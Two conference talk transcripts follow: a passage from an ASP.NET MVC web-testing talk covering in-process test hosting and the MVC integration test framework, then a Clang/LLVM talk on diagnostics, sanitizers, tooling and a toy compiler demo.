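using NUnitLite;   // one possible in-process runner; the talk only says "the NUnit runner"

public class IntegrationTestController : Controller
{
    // e.g. GET /IntegrationTest/Run?fixture=SpecOverflow.Tests.SeleniumTests
    public ContentResult Run(string fixture)
    {
        var testAssembly = Assembly.Load("SpecOverflow.Tests");

        // Runs the requested fixture *inside* the IIS worker process, so the
        // tests share the app domain (and any in-memory fakes) with the site.
        int failed = new AutoRun(testAssembly)
            .Execute(new[] { "--test=" + fixture, "--noresult" });

        return Content(failed == 0 ? "PASSED" : failed + " test(s) FAILED", "text/plain");
    }
}
```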
So the same test that was failing when I was running it from Visual Studio, because then it was running from a different process. If I just host it into the IS process somehow, it's passing. And you can also see that it's also faster, even though that right now this was bringing up Firefox in the meanwhile, it was just too fast. So this is one way, probably not in production, but just to imagine how this could work or what would be some alternative scenario. And in some cases, there were some, some alternation, you can have that. Of course, you can have some kind of small test controller test, which is just calling this, like what I did with the browser, just invoking this URL and checking the HTTP result or the content and just passing or failing depending on the test has passed or failed. But this will be just some, some tiny controller method for that. So this is, this is a crazy idea, but just to show you what would be a more ideal scenario if, if our tests and the application was running, running the same process. However, there is another solution for that. And this is based on Steven Sanderson's article, I think four or five years ago. So it's quite, quite old article. How many of you have heard about this MVC integration testing framework? It's not really a framework. Only a few. So this, this framework or this, this way how that, that, that Steven Sanderson has, have described is actually using some infrastructure of the ASP.NET framework itself, where actually ASP.NET and MVC is bound to IS, so therefore you cannot just host it in, in proc, at least in your app domain, but, but there is a hook to be able to host ASP.NET inside your process, but just in another app domain. Okay, so this is, this is possible with the, with the way how Steven Sanderson describes that. And he even created a small implementation and he was just calling it MVC integration testing. So there are multiple variants and folks of that. If you search for this term, then you will find a lot related to that. But basically what it does, it just creates this new app domain, which is an IS-like app domain, which is hosting your application and, and also your tests. And basically it just has a small controller outside, which is, which is communicating with tests through, through remote thing. And there are some quite interesting infrastructure used for that, which I will not explain in detail. But this is the core essence of that. I will just show you in a, in a, in a second. One other thing that's, that is interesting with this MVC integration testing framework that actually is not using the browser. So that the requests are not going through the browser, but just below the browser. So directly into the ASP.NET MVC, or ASP.NET runtime, you can still, you have to still use the URLs and HTTP requests, but just not, not through the browser, which is having a funny benefit of that. You can also access some states, for example, the model state of the action result of your, of your ASP.NET MVC action. So this, I will show you how, how this, this could work. So just switching back to my Visual Studio and to the MVC integration framework sample. By the way, all these code samples will be provided. So you can go ahead and, and play with that also at home afterwards. So, so basically the beginning is pretty much the same. So I'm just inserting some data to the database. However, and this is where the MVC integration test framework starts. There is a call apphost.simulate browser, browser session. 
And here I have to provide a delegate. And inside this delegate, I can make some fabric request like get and, and, and whatever, and I have access to the, to the HTML response text. And I also have the access to the, to the view result. So I can just grab out the model as well. And the trick is that this delegate, which is inside here, will run in the other app domain. It will run in the app domain, which is hosting my application. Everything else is running in the test app domain, but, but this delegate inside is running inside the test app domain. So if I would run that, then this is still failing. This is failing because this, given the following questions registered. So the, the one which is just entering the data into the in memory is not inside this scope. So this is running in the test app domain and not, not in the app domain that is hosting the, the, the application itself. But if I just move this in inside this delegate and rerun the test, then, then it just gets passing hopefully. Let's see. Yeah. So, because this is, this all code is basically running in the same app domain, shared memory, whatever, like the application. So you can do all the tricks that, that you could do with the, with the in memory case. Actually what I could do, I could move everything inside this delegate. So, so actually I could change my tests in a way that, that there is just this outer layer and everything is inside this delegate and then I would have a very, very similar feeling that, that you would have with the in memory case. And I think this MVC integration test framework, the concept is, is quite interesting and we are using it quite often in our applications. This is a very good compromise between, between having a control layer test and the, and the full browser automation test. I think it's pretty, pretty interesting and it makes sense to, to look at it. The, the bonus track is that since it's, with spec flow plus runner, so we have actually a test runner, the test runner that you have seen here was actually not the MS test runner, but this was our own test runner. And if you think about this scenario that I was mentioning that everything is, that I would move everything inside the delegate and actually the test method is just a thin, this is just a thin layer about around my, my testing code. You could think about that maybe this, this wrapping could be also injected with, with post-sharp or something like that. And, and following this, this thinking, actually you can also think that, okay, the test runner framework could also wrap this around. So please, test runner framework, please wrap all my tests with this similar browsing session host and then I don't have to care with it. And this is how, what we have implemented at least in a, in a some kind of preview or very awful mode. So actually our test runner is now able to create this small controller and actually the same scenario runs like, like with the ASP, then we see integration testing framework, but just the difference is that, that the tests are before execution, before executing the test, they are actually hosted on that app domain that is actually hosting also the application. So with that, you, you get the full, the same feeling like the in-proc testing with the end unit hosted inside, without this hex around hosting the end unit runner inside your application. So I just quickly show you that one as well. 
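Before that, here is what a complete test against the MVC integration test framework looks like once everything is pulled inside the delegate. Member names vary between the forks of Steven Sanderson's original code, so treat AppHost.Simulate, Start, Get and RequestResult as approximate, and TestDatabase and HomePageModel as stand-ins for the sample app's own types:

```csharp
using System.Linq;
using System.Web.Mvc;
using MvcIntegrationTestFramework.Hosting;   // namespace differs between forks
using NUnit.Framework;

[TestFixture]
public class HomePageTests
{
    [Test]
    public void Home_page_lists_registered_questions()
    {
        // Spins up an ASP.NET-like app domain hosting the web project.
        var appHost = AppHost.Simulate("SpecOverflow.Web");

        appHost.Start(browsingSession =>
        {
            // Everything in this delegate runs in the application's app domain,
            // so the arrange step sees the same in-memory database as the site.
            TestDatabase.AddQuestion("How do I host MVC in-process?");

            RequestResult result = browsingSession.Get("home/index");

            // Assert against the raw HTML...
            StringAssert.Contains("How do I host MVC in-process?", result.ResponseText);

            // ...and against the action's ViewResult and model directly.
            var view = (ViewResult)result.ActionExecutedContext.Result;
            var model = (HomePageModel)view.Model;
            Assert.That(model.Questions.Count(), Is.EqualTo(1));
        });
    }
}
```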
So, but it's not that much visible because from the test what you see that is pretty much the same as it was, like the Selenium test, you don't have any special hooks, any special delegates, it's just go saves the data to the database, goes to the controller, this one is using the specs for MVC and doing the assertion in the database. One bonus thing is that just, just like with the MVC integration test framework, here I also have access to the model state. So I can just, I can decide whether checking what kind of texts are listed in my page, I can think what is more efficient, whether I'm just grabbing it from the HTML result or whether I should just access the model data that was returned by the, by the control action itself and or you can do both, like in this case. So right now, this, the same assertion is done on the HTML level and also on the model level. So this is what I can run. I just have to tell this spec flow runner to, to go to the, to use another settings and just, just disappeared from my, from my list. So that it should use this web execution settings and the, and if I just run this test then somehow what I did, I moved around the things. Okay. So if I run this test, hopefully builds, then actually this will pass. So it will use the in-memory database and, and also it's running in the same app domain. So you also get some performance benefit. But you can also see that this is now two seconds. So it's like the pure controller layer testing was. Okay. This is on one hand caused by, because we don't have to go cross app domain. So everything is hosted in the same place. So no overhead is, is attached to that. And the other thing that I have used is I, I was using here now a headless browser. I could use the, the Fontome GS headless browser as well. This is a great product and I love it. And I really, I, it's now very easy to use it in.NET. You just add the Nougat package, phantom.gs.exe and, and configure your Selenium to use phantom.gs instead and it works. So it's, it's very fantastic. However, there is another tool that I didn't mention yet, which is called, which is called, where is my set? I'm going to go wrong test. Which is called Simple Browser. Have you, have you ever heard about Simple Browser? It's an open source browser implementation. It's not supporting JavaScript, but anything else it supports very well. And it's written fully in.NET. And the benefit of that is that if you want to do some testing where, where you want to test a page which is not JavaScript intensive, that you can use this Simple Browser, which is also implementing the, at least the Simple Browser.WebDriver package, implementing the iWebDriver interface. And it's fully integrated in the same app domain and, and process. So it's a, it's pure.NET implementation of, of a very Simple Browser. If you want to have some fast and, and, and result, then it's absolutely makes sense to look at that. Okay. So, to wrap up this. So I think by ignoring mocking and subbing, because it's just saying that, oh, this is not good, because then you are lying, is bad, because then you are just basically ignoring a very important tool, your, to make your testing efficient. If you can make your testing efficient all together, it's, it's, I think it's very important to have a good project success, at least in our, our experience. This was, this was absolutely like that. In ASP.NET, this testing, this output, output testing is pretty hard. 
Okay, so to wrap this up: ignoring mocking and stubbing just by saying "this is not good, because then you are lying" is bad, because then you are ignoring a very important tool for making your testing efficient — and making your testing efficient is, I think, very important for project success; at least in our experience it was absolutely like that. In ASP.NET this output testing is pretty hard, because you don't have full control over the dependencies, over the components you have. Of course you can build some back doors and hacks, also through the Web API, but that's pretty hard. So it makes sense to look around for tools that can help you. For example, this MVC integration test framework is very good, and especially in combination with things like SimpleBrowser or the PhantomJS browser you can set up a very useful and productive way to test your application. And of course when OWIN and ASP.NET vNext come, this will again be very important. So, to wrap up the session: we actually had quite a long journey today. We started from the Selenium WebDriver, then we considered something like Coypu, which is a functional layer on top of the WebDriver interface, and page objects, which are a declarative way to use your page. You can also see that SpecsFor.Mvc — or the concept of using your model objects, actions and controllers — is some kind of in-between solution, combining the benefits of both, especially for MVC applications. Then we considered how to make the testing more efficient with mocking and stubbing. And we saw that you can solve the out-of-proc testing problem on one hand by hosting your tests inside the application — the NUnit-inside-the-web-application approach, which I would probably never use in reality, but which I think is very important at least for understanding the concepts — or, the other one, which we are really using quite heavily, the MVC integration test framework, which gives you more or less the same with only a little bit of overhead, but on the other hand with the big benefit that you can also access the model data and the validation data. So if you don't want to grab the validation messages back from the UI, you can access them from the validation context of ASP.NET MVC and make the assertions against that. There are quite a lot of possibilities there. And right now we are also trying to implement this in our own runner, at least as experimental stuff that tries to avoid the overhead of using this delegate with the MVC integration test framework. I'm pretty sure you could also do this with PostSharp — wrap your methods automatically with this delegate call. Okay. So this is what we have seen: in the first part we were focusing on test first, and after that on these steps and mocks.
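Since page objects came up in that recap, here is a minimal sketch of what one can look like on top of the WebDriver interface — the page name, URL and CSS selector are just made-up examples.

    using System.Collections.Generic;
    using System.Linq;
    using OpenQA.Selenium;

    public class QuestionListPage
    {
        private readonly IWebDriver _driver;

        public QuestionListPage(IWebDriver driver)
        {
            _driver = driver;
        }

        // The test talks in terms of the page, not in terms of raw selectors.
        public void Open(string baseUrl)
        {
            _driver.Navigate().GoToUrl(baseUrl + "/questions");
        }

        public IReadOnlyCollection<string> QuestionTitles
        {
            get
            {
                return _driver.FindElements(By.CssSelector(".question-title"))
                              .Select(e => e.Text)
                              .ToList();
            }
        }
    }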
Yeah — conclusions. I think there are three things that you should keep in mind. The first is that this web testing topic is changing, so don't get stuck with your decisions and your thoughts; reevaluate everything every year or every two years, because you will probably end up with different results. This is a topic where you cannot make stable decisions, so if anyone is watching this talk in 2014 or '15, they should be very careful about my statements. The second is that you have to define a testing strategy which supports test first. Actually that is two statements, and one of them is that you have to define a testing strategy at all. I've seen many times the problem that a team just starts to do testing, produces hundreds of tests, and then realizes that how they are doing it is absolutely unstructured and there is no concept behind it, because they think the tests are just second-class citizens in the code. But this is wrong. Please take your time while you still have only a few tests: consider different alternatives and try to find a strategy that fits best to you, to your team, to your project, to your requirements, to your environment and whatever else. Do this before you have tons of tests, because otherwise it will be very hard to make any changes. And of course, if you manage to make the strategy support test first, then you get a lot of benefit for these modern MVC applications. The last thing is that there really is no single tool that supports you for everything. So when you are trying to define your strategy, or fine-tune it, you really have to look around and evaluate many tools that can support you. Be open minded about that: try as many things as you can and find the combination of tools that fits your project. Unfortunately, today that is the only way to do it — there is no single tool that would solve every problem. I do think the WebDriver interface should be at the core of these tools: whatever you use, try to find a tool which, either from the browser side or from the API side, supports the WebDriver interface, because I'm pretty sure this will be the topic of the next years. Good. As I mentioned, here are the resources; all of them can be found on this page. I tried to find a bit.ly URL that you can remember, so it's NDC 2014 GN — GN is my initials — so probably that is something you can remember. All of the links, the videos and the source code are published there, so you can just download it and play with it. I have already uploaded it, so the links should work already. Make up your mind and try to define your own strategy, and I really wish you good luck with that. But before I close, do you have any questions? Yep — yes... yeah, I just didn't want to blow your mind with yet another tool, but yes, it's a good spot. So actually, if you use the MVC integration test framework, it is not listening on any TCP port; there is no web framework or whatever on top. It just gives you an API where you can send a URL, a header collection and so on. However, what I did — and what you can do — is that there are plenty of very simple HTTP hosts or HTTP listeners out there, so I just created a very small HTTP listener which basically works like a proxy: it accepts the request and routes it through the MVC integration test framework API. It's quite complicated; if you check out the source you will also find it, but that was the trick. So there is an additional mini framework which is just used to be able to do browser automation through the MVC integration test framework.
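A rough sketch of what such a mini proxy could look like, using the built-in System.Net.HttpListener — here the simulateMvcRequest delegate is just a placeholder for however the integration-test framework is actually invoked, and the port is arbitrary.

    using System;
    using System.IO;
    using System.Net;

    public class MiniProxy
    {
        // Placeholder: routes a relative URL through the in-process MVC integration
        // test host and returns the rendered HTML.
        private readonly Func<string, string> _simulateMvcRequest;

        public MiniProxy(Func<string, string> simulateMvcRequest)
        {
            _simulateMvcRequest = simulateMvcRequest;
        }

        public void Run()
        {
            var listener = new HttpListener();
            listener.Prefixes.Add("http://localhost:8123/");
            listener.Start();

            while (true)
            {
                HttpListenerContext context = listener.GetContext();
                string relativeUrl = context.Request.Url.PathAndQuery;

                // Instead of hitting a real web server, answer from the in-process test host.
                string html = _simulateMvcRequest(relativeUrl);

                using (var writer = new StreamWriter(context.Response.OutputStream))
                {
                    writer.Write(html);
                }
                context.Response.Close();
            }
        }
    }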
Any other questions? You all want to go for lunch? Okay. Thank you very much. I will be around, so if you have any questions, just come by to me. Please don't forget to give feedback for this talk — it's very important for me to hear your opinion. You can also write me an email if you liked or disliked something in this talk. I wish you a good rest of the conference, and have fun. Thank you.
|
Web application testing is a rapidly evolving topic, so year by year it is reasonable to enumerate the possible options and re-evaluate the web testing strategy you have chosen for your project. In this talk I would like to share what we have learned about web testing during our projects. I will show strategies and tools that have worked for us to address the different specialties of the different applications. (Did I mention already, that there is no one-size-fits-all solution in web testing?) You will hear about things like test-driven web development, problems and solutions of unit testing MVC controllers, efficient usages of Selenium WebDriver, but also about headless browser testing, parallel test execution, cloud testing and of course a bit of SpecFlow.
|
10.5446/50806 (DOI)
|
Welcome everyone. I was supposed to be on vacation today, but one of my colleagues asked me to talk about Clang and I changed my vacation plans to be here. I'm very pleased to be here and very pleased to talk about Clang. I'm a software engineer at Cisco. In my daily work I'm on the graphical user interface team; we're making the GUI for Cisco's telepresence endpoints. I spare a couple of hours every couple of weeks to contribute to Clang. So, today's software environment: the software industry is going in multiple directions. Cloud is an important part, for example. Servers and desktops are still dominating, but we also have other key players in the market such as mobile phones, smart watches, smart TVs, gaming consoles, set-top boxes and many other things. And of course each of these devices has different requirements. To satisfy these requirements we need to create better software and better tools, we need to enhance our programming languages and improve our workflows. All this diversity requires portability: you don't want to duplicate your code, you don't want to rewrite it for each target. For example, in a video game engine you don't want to write your AI for PlayStation and then again for Xbox, right? You want to keep the same code. And as far as this portability is concerned, C and C++ still dominate. They also provide high performance, and the industry has great experience in C and C++ that it can leverage to deliver better products. There are not many C-family-language compilers in the market: we have Clang, GCC, Visual C++, the Intel C++ compiler, SunPro — which became Oracle Studio, I guess — IBM XL, and a couple more. But we're going to talk about GCC and some problems that we experienced with GCC a few years ago, and the reasons why Clang was born. We know that the world's code is compiled with GCC, right? All Linux distributions are compiled with GCC. At Cisco we compile most of our code with GCC. Google is using GCC. If you want to compile Clang on Linux, you would probably need GCC, because Clang requires a compiler that supports C++11. And GCC is a little bit old — still younger than me, but it's from 1987. I vaguely remember 1987; I vaguely remember Black Monday. We also know that GCC compiles many languages: that includes C, C++, Objective-C, Objective-C++ — thanks to Apple's contributions — and Ada, Java, Fortran... any more? Do you know? D. Okay. Maybe more. Okay. That's recent, I assume? No, it was around earlier. Okay. And we know that it works, because it's been around for a very long time, it's been in use by many companies, it's been used on different architectures. So we know that it understands the code and it generates a fantastic object file. So why do we need another compiler? The first wrong answer is "why not?" — and of course that's not the answer. At the time when Clang was born, one of the reasons was that GCC wasn't generating friendly diagnostic messages. In some cases it would just give you a set of tokens if you had a syntactic error. I'm going to show you some examples; you can see other examples in various Clang-related talks. And GCC's source code wasn't friendly either. I think before GCC 4.8, GCC was written in C, and it had a very legacy C source base dating back to '87. That changed after GCC 4.8, but when Clang was born, I think the latest GCC was GCC 4.2. And its parser was doing constant folding.
So given code like this, GCC would generate an AST that would actually represent code like this. And if you want to create a source-level tool, this is not what you want. GCC is one rigid binary; it is not reusable. You can't separate GCC into individual parts and reuse them for your own purposes. It changed its license to GPLv3. You might also remember that Apple had signed an agreement with the Free Software Foundation and contributed the Objective-C and Objective-C++ patches to GCC, but then GCC changed its license to GPLv3, which has what is called an anti-patent clause, and GPLv3 prevented its use by Apple, basically. All these problems combined have some implications. It cannot be integrated with IDEs, because it's one single binary, and there may be licensing problems too: you might be distributing your own IDE under your own proprietary license, and that's not compatible with GPLv3. It has no tooling support, because you can't separate it into parts; you can't create source-level tools with it; you can't create source-to-source transformations. If you want to format your source code, you would prefer something that understands the language to format it. Or if you want to query something in the source code, you want a tool that understands it — you don't want to use grep. And GPLv3 prevents its use in the Apple ecosystem, basically. If I recall correctly, Apple has its own license terms when you ship something on the App Store — maybe somebody here has made an App Store app — and that's not compatible with GPLv3. That being said, we're not enemies. Clang needs GCC — or some compiler — to be compiled, and that's generally GCC. We're trying to solve an engineering problem: we have source code, we want to take that in, compile it, and generate an object file. There are some legal aspects to it, and these two projects have different goals. GCC is a Free Software Foundation project; it's promoting free software and discouraging the non-free use of GCC. Clang is a BSD-licensed project and it has different goals. So, LLVM was a research project of Chris Lattner, who was then hired by Apple. In 2003 he released the first version publicly — before that there were some other releases, but it wasn't 1.0. It's released under a BSD-like license, so it can be consumed by commercial entities very easily. And it was using GCC as a front end; it was named llvm-gcc until LLVM 2.9, and this binary was distributed. Overall it looked something like this: the source code comes in, the GCC front end picks it up and generates an intermediate representation, which is picked up by LLVM, and LLVM optimizes it and generates an output, basically. In 2007, Clang was announced — Clang, the C language family front end. This is Chris Lattner's original message to the mailing list; I'd like to read the parts of it which I think are important. It is built as a set of reusable libraries, and among other things this means that LLVM can now be used for a variety of source-level analysis and transformation tasks that it wasn't suitable for before. Apple has an IDE, and they wanted to improve the IDE as well — this serves that purpose very well. As I mentioned, the software industry has different requirements; we wanted to create tools that improve our workflows, and at the time GCC wasn't really enabling that. So, Clang compiles C-family languages today.
It compiles C, C++, Objective-C, and Objective-C++ — the difference between the last two being that Objective-C++ lets you use C++ together with Objective-C. Overall — and this is not a precise picture — the architecture looks something like this: the source code comes in, the lexer and preprocessor pick it up and convert it to a stream of tokens, then it goes to the parser. The parser talks to the semantic analyzer, the semantic analyzer creates nodes in the abstract syntax tree, and then the abstract syntax tree is processed by what we call a front-end action. CodeGen is a front-end action that traverses the tree and generates an output by using LLVM to emit the code. Today it is supported on Mac OS, Linux, and Windows. Oops, it skipped too fast. I don't know the state on Windows — I never used it on Windows — but it's stable on Mac OS X and Linux. Some sanitizers don't work on Mac OS, as far as I remember; they all work on Linux. When you watch a Clang presentation anywhere, or read something about Clang, we like to brag about better diagnostic messages. It's often called expressive diagnostics; it's one of the strengths of Clang, and I personally like it a lot. This happened a few years ago: my colleague just called me over and asked what was wrong with this code. This is actually generated code, but somehow Qt's meta-object compiler failed to regenerate the code. So we compiled this and we got an error message that said the void value is not ignored. I recently compiled this with GCC 4.9 and there's an improvement: it has a caret here and also shows you the context. That's great, because you can now see the left-hand side and the right-hand side of the assignment, but the error message still stays the same. If you compile this with Clang, it will tell you exactly what the problem is: the problem is assigning an incompatible type. It also highlights the relevant expression range. enable_if is used all over the place — does anybody not know what enable_if does? If you compile this with GCC, GCC will tell you what went wrong with this code; what went wrong is that, well, there were some candidates and substitution failed, so there is no type in enable_if. If you compile this with Clang, Clang will cut to the chase and basically tell you that it's disabled by enable_if because the predicate evaluated to false. I think this is a much clearer response. I don't know how often this happens, but I like this one a lot: you want to take the absolute value of an int, an unsigned int — well, an unsigned int — and a double, and then you try to compile this with GCC. It will tell you that you didn't use this one — because in my example I didn't use those — but it basically will not tell you anything. If you compile this with Clang, it will tell you that you're trying to take the absolute value of an unsigned integer. Likewise, for the double, that you can include <cmath> and use std::abs. There's another example where we can diagnose or prove that we are... Yes — yes, there's a special rule for the absolute value functions, and it will detect that you're misusing them. That also applies to enable_if: it recognizes the pattern and checks whether it is enable_if. Then there was this example: we're trying to access the nth element of an array, and it is actually out of bounds. If you compile it with GCC, it will tell you that you didn't use j — so it doesn't diagnose this case. But if you compile it with Clang, it will tell you that you're trying to access an index that is out of bounds.
Fix-its and typo correction are also really key features of Clang. In 2012, I think, Matt from Google presented Google's build system statistics, and it turns out that typo correction helps developers a lot when they have typos: Clang can suggest that you have a typo and you can fix it. In this example we have a typo — we're missing a 'u' here. If we compile it with GCC, it will tell you that there is no 'cot'. That's correct, there is no 'cot'. But if you compile it with Clang, it will tell you there is no 'cot' — but did you mean 'cout'? It highlights the area, it suggests a fix-it, and it also shows you where it's declared — the actual typo-corrected, recovered version. Here there's a syntax error: I usually don't do it with enable_if, but I sometimes forget it — I think we're missing a 'typename' here. If you compile it with Clang, it will tell you that you're missing a typename, and it also gives you a parsable fix-it which can be consumed by various tools that are also included in Clang. Or you can write your own tool that parses this format and fixes the code for you — Xcode and various other IDEs use that facility. I think this was my first ever patch to Clang: the destructor name does not match the class name. If you compile it with GCC, it tells you that, well, a class name is expected and it can't find it; but if you compile it with Clang, it will also tell you what you should write there. If you use this with Xcode, Xcode will highlight that line and have a fix-it option for you that can automatically fix the issue. This warning was implemented a year ago by another Google engineer, but it was pretty aggressive: I tried to compile our code at Cisco with Clang and I found that there were some header guards that are intentionally — sorry, some macros that are not header guards — that differ. So we improved this algorithm last August, and now it diagnoses that you have a typo in the header guard, but it doesn't warn you about the H2.h case, because we basically calculate the edit distance between the check and the definition. If it's 50% different, that means it's intentional. The reason it's 50% is that the name could be short or it could be long — but it's not written in stone; we could improve that with some heuristics, say, macro names shorter than 10 characters can have an edit distance of three. This is also a recent patch I submitted. In this range-based for statement we have a small typo: the user has typed an equals sign instead of a colon. If you compile it with GCC, GCC will tell you that you're missing — actually, I think, two semicolons; yes, it's diagnosing both cases, because in a normal for statement you would have three parts: initialization, condition and iteration. If you compile it with Clang — with a really recent version of Clang, actually — then you get a fix-it suggestion. We also try to recover from this. What we do is follow this declaration; if this is a single declaration and we find an equals sign, we store its location and continue parsing. If we hit a right paren — a closing paren — and we're in C++11 mode, we suspect that this is a range-based for loop, and then we say: replace the equals with a colon. There are some other interesting features of Clang. I think this one is Google's contribution to Clang: what it does is query your AST, and there's an extra tool, clang-query, that enables you to write dynamic queries.
Grep, or regular expressions, or your IDE — some IDEs are pretty good at finding things you're looking for — but often that's not the right tool. They can't handle preprocessor directives, for one thing. AST matchers, on the other hand, know C++: they can parse the code, they understand the constructs, they cover most of the cases, and if you think that's insufficient, you can extend the AST matcher functionality. There are some example queries: if you want to find all functions returning an int, you say function declaration, returns, an int. The syntax is also pretty intuitive, I think. Likewise, the sanitizers are also contributions from Google. They're also available in GCC, so these are not Clang-specific things, but I'm going to show you the Clang versions. What the sanitizers do is bounds checking, use-after-return, invalid free, and memory leak detection. One of my colleagues recently ran into an issue: he had written an image conversion function, and then wrote an improved version of it. In his improved version he wanted to improve it further by moving some of the function calls into a loop body, and it turns out he kept a variable with the same name as another variable in the for loop. So what happened was that he incremented it both in the for body once and in the iteration statement once; he was skipping a few pixels here and there. Of course it was overwriting memory and it was crashing. He couldn't find it, but the address sanitizer found it. Then we have the memory sanitizer: MemorySanitizer can check accesses to uninitialized memory, and it can also track their origins. ThreadSanitizer is also an interesting one — it detects data races. The reason these sanitizers are separate, unlike Valgrind, is that each sanitizer does one specific thing and tries to do it as fast as it can. We also have an undefined behavior sanitizer that tries to catch many undefined behavior cases. I'm going to try to demonstrate some of those. Question? No, you need to specify them separately. The sanitizers are LLVM passes — they emit code. For example, this is probably the simplest one, array bounds: if we know the array size statically and you try to access beyond that — an out-of-bounds access — we emit some code during compilation, so when you try to access that memory location, we trigger a runtime error. Clang also has a tool called clang-format that formats the source code. As I said, I don't like long lines. Wide screens are sometimes not good for developers: they keep typing and typing, and the whole line goes beyond, I don't know, 120 characters. It's hard to read — I think we can recognize patterns easily if they're compact within a narrow area. So clang-format will basically format this based on a formatting specification you provide. There's also a tool called clang-modernize. clang-modernize will take your old C++ code — like iterating from zero to n over a regular C array, or by iterators on a vector, or with the vector's size — and basically convert it to something more modern: C++11 range-based for loops. Clang also has a static analyzer. This is a great feature; it's integrated with Xcode as well, and you can run it individually or integrate it into your build system. This was my first ever attempt with the static analyzer.
It might not make sense, but my purpose was to detect whether this array subscript had wrapped around somehow while coming from an untrusted source. This is a dynamic checker — it's a separate shared library loaded by Clang. What the static analyzer does is symbolically execute the code. It conjures a symbol C — and it basically conjures symbols for the others too — does the operation, and here we create an assumption. One assumption says this operation doesn't wrap around, in which case we stop following the path because everything is fine. In the other case, if it wraps around, we keep following the path. So C — in the wrap-around case — will be used as an argument to the function call f, and in f it will be used as an array subscript, and we diagnose this case: we wanted to find out whether this symbol has been used as a subscript. It also supports dynamic checkers, meaning you can extend it, and this one was my first ever attempt to make a dynamic checker. I would also like to talk a little about libc++. This is basically a kind of rerun of Howard Hinnant's slides — these are not my slides. libc++ was designed with the fact in mind that libstdc++ might also be loaded at the same time, so there should be some sort of compatibility between the two, and any exception thrown from libc++ or libstdc++ should look identical to the application — they're ABI compatible. And libc++ is versioned with inline namespaces, which prevents ABI breakage. For small containers such as deque, I can confirm these numbers — I tested it recently, a few weeks ago: in libc++ the size of an empty deque is 48 bytes, and it's 80 bytes in libstdc++. Size matters because you want to move things around and fit them in cache lines. And libstdc++ allocates 576 bytes in its default constructor. For map, the size is twice as big; there's no difference in the default constructor. And for unordered_map there's not much difference in size, but there's a default construction cost. Sort in libc++ never copies — it swaps or moves — so if you're dealing with strings, for example, this is going to be pretty fast. It tries to adapt to patterns in the input. If you feed it an all-equal sequence of integers and sort it, the difference between libc++ and libstdc++ is 20x. If you feed it an already sorted sequence, the difference is 10x. If the sequence is reverse sorted, it's 5x; in this shape, 3x; and so on. These actually seem like common patterns: you have an already sorted sequence, then you insert something new and sort it again. In that case the performance gain is roughly 3 or 4 percent, depending on what you're inserting. Of course, this is not free: the pattern recognition costs roughly 5% if you feed it a completely random sequence. So, we keep writing code. We love C++ and some of us just, you know, write crazy code for fun. But do we know how things work in the compiler? How does the compiler take that source code and make something that actually runs? Clang is built as separate libraries — these are some of the libraries used in Clang that you can individually link against. If you remember the slide: the source code comes in, it gets lexed and preprocessed, then it's parsed, then the semantic analyzer tries to create the abstract syntax tree. So we have code like this. I intentionally put this macro in to show you macro expansion; it's used here. Once it is lexed and preprocessed — ah, this Keynote bug.
The macro gets expanded, and then what the parser sees is actually not the source code but a stream of tokens. When we create the AST context, the first thing we do is create the root of the tree — that's the translation unit declaration. Then the parser pulls in lexed tokens. The first thing it sees is the template keyword. What can happen after the template keyword — what can come after it? Okay, one more thing: an explicit instantiation. So in this case it picks up the template keyword, but it needs to check the next token: it could be a less-than, or it could be an explicit instantiation. If it's a less-than, then we're parsing a template parameter list. We still don't know what kind of template it is — it could be a specialization — so we keep parsing, pulling the tokens in. When we hit here, we act on the template parameter list: that basically creates a template parameter list and checks whether something is wrong with it. Then it finds the struct keyword and the identifier, and it acts on the tag, meaning it will create the class template declaration and the non-type template parameter declaration for the bool Cond parameter here. And parsing continues with the left brace, the body basically, the right brace, the semicolon — yeah. At the end the AST will look roughly like this — maybe I should have printed the abstract syntax tree: there's a variable declaration; its initializer is calling a function f whose argument is a conditional operator, whose operands are a binary operator, and so on. So what comes next: okay, we have the AST, now we need to run a front-end action on it. If you want it to generate an output for you, then CodeGen is the front-end action that will be run; there's also a syntax-only action that just checks whether the syntax is correct. What the CodeGen action does is visit all the top-level declarations — it's a tree traversal. It creates the global variable i as the first thing, then the template instantiation, which will be an int f(int), then it will call that with five, because it finds that five is less than 42. That being said, I'd like to show you some demos. I have created a small compiler — where is that? So we're going to parse this. We say there's an external function called raise; it takes an argument and returns an int. This is my dummy language: I was waiting at the passport office — the police office — and while sitting there I thought maybe I could create an example compiler for this talk. I came up with this funny syntax; it looks a bit like C. Then we define our constants in this function — LONG_MAX, LONG_MIN and SIGFPE — and then we check whether adding a and b would overflow; if it does, then we raise. This was a very good exercise for me, too. So let's create an unoptimized version first — I think this was the optimized version. This is what it looks like to LLVM: it creates a definition for our safe-add-integer function. These are local variables; they will be allocated on the stack. Then it stores these constants in these locations, then it does the comparisons and jumps around. If we compile this to an object file, then we have... we will try to add LONG_MAX to whatever we specify on the command line as an argument. adder.o, safe adder. If you add zero, nothing happens; if you add four, then it will fail. I think I have also prepared a greatest common divisor function for you — this can show you LLVM's control flow graph.
This is how LLVM sees the control flow graph of this function, too. If we come back... gcd.demo, gcd.ll. By the way, maybe I should compile the previous example with optimizations on here — let's say optimized.ll. Hmm, something is wrong with my demo. Let's see if this crashes as well. This worked somehow. The Graphviz CFG view — we are not interested in that; we wanted to see the optimized version of the generated code. Let's show this first: this is the pretty-printing of the abstract syntax tree. I have written this parser like Clang's parser — it's a recursive descent parser. Did I run out of time? No. You can see here that we have a compound statement — the function body — and then the binary expression, an assignment, with on the left-hand side a variable named LONG_MAX, and it is assigned an integer literal — actually a long literal. This optimized version of... yeah: previously there were local variables here allocated on the stack; now LLVM found that it doesn't need those things and can basically inline these constants. Let's also go to the sanitizers. Let's go to ThreadSanitizer first. This is based on — sorry — it's part of the DeLesley Hutchins presentation from Google. They have a cache item; they want to store things in a cache, and when you look up an item in the cache, this lookup function tries to pin it so that it won't be pruned from the cache, basically — after some time items get deleted from the cache. There's also a scoped-lookup class here that tries to leverage RAII: in its destructor it basically releases the key, unpins it. The bug was here, as you can see: somebody forgot the curly braces to put this in a scope. In that case the scoped lookup — this lookup_val object — will be destroyed after the mutex has been unlocked, and somebody could overwrite it. They say this cost a few man-weeks to find and fix, because everything looked really clean. If we compile this with clang -fsanitize=thread, cacheRace.cpp, cacheRace — I'm going to use C++14... oops, I don't want to use libstdc++, I want to use libc++, which also requires libc++abi. If I run this cacheRace, then it will tell me about all these threads — thread numbers — it basically tells you that somebody wrote one byte that was previously written by another thread; see thread number two and number three and number four. It seems that here somebody pinned it and then it's unpinned, but in an unsynchronized way. But if we compile this with fixedRace — where the scoped lookup is put inside curly braces, a block scope — then the lookup_val object is destroyed before the mutex is unlocked, and it just runs without any trouble. 